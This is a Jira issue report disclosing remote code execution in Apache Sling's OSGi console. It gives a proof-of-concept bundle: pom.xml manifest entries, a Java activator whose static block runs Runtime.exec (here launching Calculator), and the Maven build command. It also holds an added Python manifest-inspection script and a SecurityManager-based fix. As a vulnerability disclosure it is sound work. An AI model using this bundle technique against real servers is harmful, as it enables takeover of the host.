QSec-Team created SLING-11658:
---------------------------------

             Summary: Sling remote code execution
                 Key: SLING-11658
                 URL: https://issues.apache.org/jira/browse/SLING-11658
             Project: Sling
          Issue Type: Bug
          Components: Console
    Affects Versions: App CMS 1.1.2
         Environment: OpenJDK Runtime Environment (Zulu 8.64.0.19-CA-macos-aarch64) (build 1.8.0_345-b01)
            Reporter: QSec-Team
         Attachments: 1.png, 2.png

h1. Exploitation process

 
After logging in to Sling, the OSGi management function lets you obtain control of the host by uploading a bundle package.

!1.png!

 
After uploading the malicious bundle package built by the attacker, first click the "Refresh Package Imports" button and then the "start" button. This triggers loading of the bundle component, and the malicious code is executed.

!2.png!

 
h1. Jar package construction:

 
Create a new Maven project and add the following build configuration to pom.xml:
{code:xml}
<build>
    <plugins>
        <plugin>
            <groupId>org.apache.maven.plugins</groupId>
            <artifactId>maven-assembly-plugin</artifactId>
            <configuration>
                <descriptorRefs>
                    <!-- package the project classes and all dependencies into one jar -->
                    <descriptorRef>jar-with-dependencies</descriptorRef>
                </descriptorRefs>
                <archive>
                    <!-- OSGi headers written into META-INF/MANIFEST.MF of the jar -->
                    <manifestEntries>
                        <Bundle-SymbolicName>shxjia</Bundle-SymbolicName>
                        <!-- class the framework loads and instantiates when the bundle is started -->
                        <Bundle-Activator>jsx.ink.Main</Bundle-Activator>
                        <Bundle-Version>6.6.6</Bundle-Version>
                    </manifestEntries>
                </archive>
            </configuration>
        </plugin>
    </plugins>
</build>
{code}
Create Main.java in the source folder.

Note that the `package jsx.ink;` declaration in the source must match the Bundle-Activator entry in pom.xml.
{code:java}
package jsx.ink;

public class Main {
    // Runs as soon as the framework loads the Bundle-Activator class,
    // i.e. when the bundle is started, before any start() method is called.
    static {
        try {
            Runtime.getRuntime().exec("/System/Applications/Calculator.app/Contents/MacOS/Calculator");
        } catch (Exception e) {
            // ignored: the bundle only serves as a delivery vehicle for the static block
        }
    }

    public static void main(String[] args) {
        System.out.println("Hello world!");
    }
}
{code}
After the code is written, change to the directory containing pom.xml and build the jar with Maven:
{code:bash}
mvn assembly:assembly -f pom.xml
{code}
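The build steps above produce a jar whose manifest tells the framework which activator class to load. The following Python script is an added example, not part of the original report or of Sling itself: it opens a bundle jar, parses META-INF/MANIFEST.MF (including the continuation lines the JAR format uses for long values), splits the Import-Package header the way "Refresh Package Imports" has to resolve it, and checks that the Bundle-Activator named in the manifest actually resolves to a class file inside the jar. It can be pointed at the jar produced by `mvn assembly:assembly` to confirm the three manifest entries, or at bundles pulled from a suspect instance to see which activator each one loads. The sample bundle it constructs inline is an assumption for the demo: its Import-Package header is not set by the Maven configuration above, and its class entry carries only the class-file magic, not real bytecode.

```python
"""Inspect an OSGi bundle jar: parse its manifest and resolve the activator class.

Added example; run stand-alone as: python inspect_bundle.py [bundle.jar]
"""
import io
import sys
import zipfile

CLASS_MAGIC = b"\xca\xfe\xba\xbe"  # first four bytes of every Java class file


def build_sample_bundle():
    """Constructed sample jar laid out like the output of the Maven build above.

    Assumption for the demo: the Import-Package header is added only to exercise
    manifest continuation lines, and the class entry is a placeholder that
    carries just the class-file magic, not real bytecode.
    """
    manifest = (
        "Manifest-Version: 1.0\r\n"
        "Bundle-SymbolicName: shxjia\r\n"
        "Bundle-Activator: jsx.ink.Main\r\n"
        "Bundle-Version: 6.6.6\r\n"
        'Import-Package: org.osgi.framework;version="[1.8,2)",org.apache.sling.a\r\n'
        " pi.resource\r\n"  # leading space = continuation of the previous value
        "\r\n"
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("META-INF/MANIFEST.MF", manifest)
        zf.writestr("jsx/ink/Main.class", CLASS_MAGIC + b"\x00" * 12)
    return buf.getvalue()


def parse_manifest(text):
    """Return the main-section headers of a JAR manifest as a dict.

    Per the JAR spec, a line starting with a single space continues the
    previous value, and the main section ends at the first blank line.
    """
    headers = {}
    last = None
    for raw in text.splitlines():
        if raw == "":
            break
        if raw.startswith(" ") and last is not None:
            headers[last] += raw[1:]
            continue
        name, sep, value = raw.partition(":")
        if not sep:
            raise ValueError("malformed manifest line: %r" % raw)
        last = name.strip()
        headers[last] = value.strip()
    return headers


def split_clauses(value):
    """Split an Import-Package/Export-Package value on commas outside quotes."""
    clauses, current, quoted = [], [], False
    for ch in value:
        if ch == '"':
            quoted = not quoted
        if ch == "," and not quoted:
            clauses.append("".join(current).strip())
            current = []
        else:
            current.append(ch)
    clauses.append("".join(current).strip())
    return [c for c in clauses if c]


def inspect_bundle(jar_bytes):
    """Summarise the bundle: identity headers, activator resolution, imports."""
    with zipfile.ZipFile(io.BytesIO(jar_bytes)) as zf:
        headers = parse_manifest(zf.read("META-INF/MANIFEST.MF").decode("utf-8"))
        names = set(zf.namelist())
        activator = headers.get("Bundle-Activator")
        present = is_class = False
        if activator:
            # Bundle-Activator is a fully qualified class name; the framework
            # loads it from the bundle's own class path, so it must be inside the jar.
            path = activator.replace(".", "/") + ".class"
            present = path in names
            is_class = present and zf.read(path)[:4] == CLASS_MAGIC
    return {
        "symbolic_name": headers.get("Bundle-SymbolicName"),
        "version": headers.get("Bundle-Version"),
        "activator": activator,
        "activator_present": present,
        "activator_is_class_file": is_class,
        "imports": split_clauses(headers.get("Import-Package", "")),
        "class_count": sum(1 for n in names if n.endswith(".class")),
    }


if __name__ == "__main__":
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample_bundle()
    for key, val in inspect_bundle(data).items():
        print("%-24s %s" % (key, val))
```

A bundle whose manifest names an activator that is not present in the jar fails at start; one whose activator is present is the class to pull apart first when triaging an unknown bundle, because its static initializer and start() method run with the full privileges of the Sling JVM.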
h1. Fix

A SecurityManager can be used to restrict certain operations, such as process execution:
{code:java}
import java.util.Arrays;
import java.util.List;

// checkExec receives the program name (the first token of the command) that
// ProcessBuilder/Runtime.exec is about to run. Only the exec path reaches this
// check; other operations need their own check methods or policy grants.
// Note: SecurityManager is deprecated for removal from Java 17 onward.
SecurityManager securityManager = new SecurityManager() {
    @Override
    public void checkExec(String cmd) {
        // one element per allowed program (a single "whoami,netstat" string would never match)
        List<String> whiteList = Arrays.asList("whoami", "netstat");
        if (!whiteList.contains(cmd)) {
            throw new SecurityException("command execute denied!");
        }
        super.checkExec(cmd); // still applies the policy's FilePermission "execute" check
    }
};
System.setSecurityManager(securityManager);
{code}



--
This message was sent by Atlassian Jira
(v8.20.10#820010)
